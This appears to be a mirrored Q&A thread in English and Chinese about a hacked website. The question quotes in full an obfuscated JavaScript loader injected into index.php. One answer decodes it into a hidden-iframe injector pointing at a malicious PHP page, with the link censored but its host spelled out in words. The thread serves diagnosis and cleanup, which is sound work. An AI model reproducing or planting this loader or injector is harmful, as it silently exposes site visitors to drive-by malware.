1

I have a site. My site Was difficult yesterday, when open it with Google Chrome, instead of my site this page is shown:

Warning: Visiting this site may harm your computer!
The website at http:... appears to host malware - Software that can hurt your 
computer or otherwise operate without your consent.
....

I viewed my page source in Chrome and I saw this script end of my code (after ):

 echo ""; echo "<script>try{if(window.document)window[\"document\"][\"body\"]=\"123\"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v[\"document\"][\"bo\"+\"dy\"]=\"123\"}catch(gfdnfdgber){m=123;if((alert+\"\").indexOf(\"n\"+\"a\"+\"ti\"+\"ve\")!==-1)ev=window[\"eval\"];}}
n=[\"9\",\"9\",\"45\",\"42\",\"17\",\"1f\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"4f\",\"2g\",\"4l\",\"39\",\"3m\",\"43\",\"33\",\"3m\",\"49\",\"41\",\"1f\",\"1e\",\"3n\",\"4b\",\"40\",\"4l\",\"1e\",\"1g\",\"3g\",\"1n\",\"3i\",\"1g\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"4e\",\"1f\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\",\"17\",\"41\",\"48\",\"4f\",\"41\",\"17\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"4j\",\"4e\",\"45\",\"4g\",\"41\",\"1f\",\"19\",\"2a\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"17\",\"4f\",\"4e\",\"3o\",\"2b\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4e\",\"3m\",\"43\",\"4b\",\"4b\",\"4f\",\"41\",\"1l\",\"45\",\"4c\",\"4d\",\"1l\",\"3o\",\"4b\",\"1m\",\"3o\",\"4b\",\"4e\",\"4e\",\"41\",\"3o\",\"4g\",\"45\",\"4a\",\"43\",\"1m\",\"45\",\"49\",\"3m\",\"43\",\"45\",\"4a\",\"41\",\"1k\",\"4e\",\"41\",\"3m\",\"40\",\"4l\",\"3k\",\"41\",\"4a\",\"4g\",\"41\",\"4e\",\"3k\",\"47\",\"41\",\"41\",\"4a\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"17\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"2b\",\"1e\",\"1o\",\"1n\",\"1e\",\"17\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"2b\",\"1e\",\"1o\",\"1n\",\"1e\",\"17\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"2b\",\"1e\",\"4i\",\"45\",\"4f\",\"45\",\"3n\",\"45\",\"48\",\"45\",\"4g\",\"4l\",\"28\",\"44\",\"45\",\"40\",\"40\",\"41\",\"4a\",\"29\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"28\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"29\",\"48\",\"41\",\"42\",\"4g\",\"28\",\"1n\",\"29\",\"4g\",\"4b\",\"4c\",\"28\",\"1n\",\"29\",\"1e\",\"2c\",\"2a\",\"1m\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"2c\",\"19\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\",\"d\",\"9\",\"9\",\"42\",\"4h\",\"4a\",\"3o\",\"4g\",\"45\",\"4b\",\"4a\",\"17\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"4e\",\"1f\",\"1g\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"4i\",\"3m\",\"4e\",\"17\",\"42\",\"17\",\"2b\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"3o\",\"4e\",\"41\",\"3m\",\"4g\",\"41\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"1f\",\"1e\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"4f\",\"4e\",\"3o\",\"1e\",\"1j\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4e\",\"3m\",\"43\",\"4b\",\"4b\",\"4f\",\"41\",\"1l\",\"45\",\"4c\",\"4d\",\"1l\",\"3o\",\"4b\",\"1m\",\"3o\",\"4b\",\"4e\",\"4e\",\"41\",\"3o\",\"4g\",\"45\",\"4a\",\"43\",\"1m\",\"45\",\"49\",\"3m\",\"43\",\"45\",\"4a\",\"41\",\"1k\",\"4e\",\"41\",\"3m\",\"40\",\"4l\",\"3k\",\"41\",\"4a\",\"4g\",\"41\",\"4e\",\"3k\",\"47\",\"41\",\"41\",\"4a\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4i\",\"45\",\"4f\",\"45\",\"3n\",\"45\",\"48\",\"45\",\"4g\",\"4l\",\"2b\",\"1e\",\"44\",\"45\",\"40\",\"40\",\"41\",\"4a\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"2b\",\"1e\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"48\",\"41\",\"42\",\"4g\",\"2b\",\"1e\",\"1n\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4g\",\"4b\",\"4c\",\"2b\",\"1e\",\"1n\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"1e\",\"1j\",\"1e\",\"1o\",\"1n\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"1e\",\"1j\",\"1e\",\"1o\",\"1n\",\"1e\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"9\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"4f\",\"2g\",\"4l\",\"39\",\"3m\",\"43\",\"33\",\"3m\",\"49\",\"41\",\"1f\",\"1e\",\"3n\",\"4b\",\"40\",\"4l\",\"1e\",\"1g\",\"3g\",\"1n\",\"3i\",\"1l\",\"3m\",\"4c\",\"4c\",\"41\",\"4a\",\"40\",\"2h\",\"44\",\"45\",\"48\",\"40\",\"1f\",\"42\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\"];h=2;s=\"\";if(m)for(i=0;i-631!=0;i++){k=i;if(window[\"document\"])s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(v)ev(z)}}}</script>";

NOTE This script wasn't in my code Before!! What is this?! How was written in my index.php file?!

4

3 回答 3

3

您的网站遭到入侵。它的发生方式通常是以下场景之一:

1)您已通过 FTP 向使用 windows 的人授予对文档根目录的访问权限,并且他/她的计算机感染了病毒,该病毒从 FTP 客户端配置中恢复了 FTP 密码(记住密码功能)

2) 有人猜出了 FTP 的密码

3) 整个系统可能会受到损害

4)某些脚本/应用程序易受攻击(如@Konerak 所述)

要找出是 1)、2) 还是第三个原因,请查看 FTP 服务器日志 - 因为proftpd/var/log/proftpd/xferlog在我的Debian系统上

如果是 FTP 问题之一,请立即更改 FTP 密码,在所有客户端上运行防病毒软件并分发新密码。要清理网站,通常只需搜索有问题的字符串并将其从文档根目录中的所有文件中删除即可。它通常是所有受感染文件中的相同字符串。还要注意 javascript 文件被感染 ( *.js)

如果网站上存在易受攻击的脚本,可以通过查找index.php的修改时间并在访问日志中找到对应的命中来识别。他们通常有 POST 方法或棘手的 GET 参数(在日志中可见)

于 2012-11-17T09:13:17.547 回答
2

是的当然:

如果您的页面在您不知情和不符合规定的情况下被修改,那么您的网站肯定存在漏洞

出于对HOW的考虑,有一点尝试发现WHAT

为了确保并了解更多关于这种编码病毒的信息,我们可以从命令行运行php

1.将错误代码复制到脚本,将它们包含在php标签之间:

cat << eof > badscript
<?php
echo ""; echo "<script>try{if(window.doc....
n=[\"9\",\"9\",\"45\",\"42\",\"1
?>

2.使用以下命令进行第一次翻译php

php <badscript >badscript2

现在badscript2包含一个javascript 编码的病毒

<script>try{if(window.document)window["document"]["body"]="1...
n=["9","9","45","42","17"...;if(v)ev(z)}}}</script>

阅读这个小脚本后(保留html标签):

sed < badscript2 -e 's/<\/\?script>//g' >badscript3

3.很少阅读 javascript 代码(我正在使用 emacs)

rename s/$/.js/ badscript3 
emacs badscript3.js

...一些格式操作...保存...

sed <badscript3.js -e 's/\t/        /g;s/^/    /;s/^\(.\{76\}\).*$/\1.../' 
try{
    if (window.document) window["document"]["body"]="123"}
catch (bawetawe) { 
    if(window.document){
        v=window;
        try{fawbe--}catch(afnwenew){
            try{(v+v)()}catch(gngrthn){
                try{
                    if(020===0x10) v["document"]["bo"+"dy"]="123"
                }catch(gfdnfdgber){
                    m=123;
                    if((alert+"").indexOf("n"+"a"+"ti"+"ve")!==-1) 
                        ev=window["eval"];
                }
            }
            n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41"...
            h=2;
            s="";
            if(m)for(i=0;i-631!=0;i++){
                k=i;
                if(window["document"])
                    s+=String.fromCharCode(parseInt(n[i],25));
            }
            z=s;
            if(v)ev(z)
        }
    }
}

所以可以看出有趣的部分来自n=[...ev(z)。为此,我使用Mozilla 的 Spidermonkey二进制工具smjs

在保留第一个(可读)部分和一些在命令行下不起作用的测试之后smjs,比如windowor document更改最后一个操作ev(在第一部分ev=window.eval中定义为更smjs适当的函数(我选择:print();-),有什么发送至smjs

n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","...
h=2;
s="";
for(i=0;i-631!=0;i++){
    k=i;
    s+=String.fromCharCode(parseInt(n[i],25));
}
z=s;
print(z);

4.最后给我看这个:

smjs < badscript3.js >badscript4.js
emacs badscript4.js

那是:

if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe
      src='http:  --  censored virus link -- .php' width='10' height='10'
      style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http: --  censored virus link -- keen.php');
f.style.visibility='hidden';f.style.position='absolute';
f.style.left='0';f.style.top='0';
f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}

注意:为了最大程度地降低cut'n past风险,我已经审查了链接,他们最初指向病毒http: 斜杠斜杠 ragoose.ipq.co 斜杠 correcting 斜杠 imagine-ready_enter_keen.php

小心点,但玩得开心!

于 2012-11-17T10:39:09.287 回答
1

我在共享主机上多次发生这种情况。通常它是您或您机器上其他人的易受攻击的脚本,然后可以查找可预测的文件路径并附加到文件中。

/home/user1/public_html/index.php for example is very predictable.

因此,该漏洞将允许某人运行"ls /home/"然后./public_html/index.php在每个目录中查找。很多时候,即使您无法 cd 进入该目录,您也可以打开这些文件。

另一种情况是您的站点或您的其他域之一存在漏洞,这将允许对您的任何子目录进行写访问(因为 Web 服务器通常归您所有)。

于 2012-11-17T09:23:06.273 回答